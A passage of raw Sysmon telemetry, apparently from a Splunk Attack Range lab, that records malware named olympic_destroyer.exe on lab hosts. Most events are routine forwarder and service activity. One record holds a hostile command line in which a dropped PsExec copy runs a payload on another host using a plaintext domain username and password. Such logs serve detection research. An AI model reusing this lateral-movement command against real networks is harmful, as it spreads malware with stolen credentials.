11:08:42.683{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295837Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:42.683{C8EA50B7-12E6-6216-4B05-000000003802}67926956C:\Temp\olympic_destroyer.exe{C8EA50B7-15BA-6216-D906-000000003802}5896C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000295836Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:42.685{C8EA50B7-15BA-6216-D906-000000003802}5896C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\ip-10-0-1-15.eu-central-1.compute.internal -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000295835Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:42.683{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-15BA-6216-D906-000000003802}5896C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000295853Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:43.883{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90B0CE47E33D0CDD8F5D0E4C19628264,SHA256=3796B849B3E3461F00EC920FFD623D8A3836E49F10C99C16D8DDCFB3CAA72DEB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219944Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:43.269{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=58357ABFD83EF9DFFB97729A41AA8A27,SHA256=C4FAA0D18BBFECBE69B971D6DF61AFD6FC0C396D3AF6FD0D96A43D28A76B2C6F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295852Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:43.714{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=10F4C7C58BFB0FFD2FB8972D5569C8A0,SHA256=D42B7EBC690B5315DC51EECD1A388E92F4306697F105F01671A591976B191FE1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295851Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:43.714{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=090EE25F55BB6677254B8055CF6768DC,SHA256=7C69FC1D834308166BFF64AFCCCC8A579EFE8CB737EBC143519F8EDBA4FC506E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295850Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:43.090{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\respondent-20220223083251-151MD5=A38EB58E8C6680789F1AEA0022EC0210,SHA256=7B5C3F2ACD9B17C99423AC4BB2B0CFD455B3A71F8C48567BF2A051FF8E6D4921,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000295849Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 11:08:42.983{C8EA50B7-15BA-6216-D906-000000003802}5896C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 23542300x8000000000000000295856Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:44.913{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85E609BC5779672BCA978B697E3EC460,SHA256=386924D02BF6EFA82F2A0CE7AFE8E7D4CBBC7DB57077EEE2B62A2E1795CADB9D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000219958Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:44.550{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-15BC-6216-D704-000000003902}2364C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219957Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:44.550{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219956Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:44.550{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219955Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:44.550{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219954Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:44.550{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219953Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:44.550{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219952Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:44.550{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219951Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:44.550{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219950Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:44.550{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219949Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:44.550{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219948Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:44.550{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-15BC-6216-D704-000000003902}2364C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000219947Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:44.550{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-15BC-6216-D704-000000003902}2364C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000219946Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:44.551{4F8D34B0-15BC-6216-D704-000000003902}2364C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000219945Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:44.285{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F797C80E278336D1C0629CD53A28DBEA,SHA256=BDE73047D4DA8A78EED6AF4A0A6CEC66F3F20036411B0968ECE17B8CC232AF47,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000295855Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:42.493{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local54564- 23542300x8000000000000000295854Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:44.100{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\surveyor-20220223083249-152MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295858Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:45.928{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D0FF9839D536FB435C658450D40D39EE,SHA256=3343C5D2C7F9E90B5DF7A6D7916E077104E7A39648A782001155F88A3C7FD069,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219975Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:45.784{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B71769DA38B3A47614865C247A9D90EA,SHA256=F28CCA93FE8C80CB0708CC4E9C55EF7E07015F61D0427B0DFE6A1E2651C02B11,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219974Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:45.784{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B740DCD01FAA2655F246719039521050,SHA256=A0172C1950F36F6C2A6CFB6737EC35F8803C1D0F23986D6B76BFF44820CC740B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219973Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:45.363{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=203BBA1A45C712B7D492658AD96FFD40,SHA256=F51DD789A018824160EE58E0CB0D43C554B37313E0870E96BB01D6566E0EDE65,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000295857Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:43.657{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local65535- 10341000x8000000000000000219972Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:45.269{4F8D34B0-15BD-6216-D804-000000003902}3792368C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219971Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:45.050{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-15BD-6216-D804-000000003902}3792C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219970Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 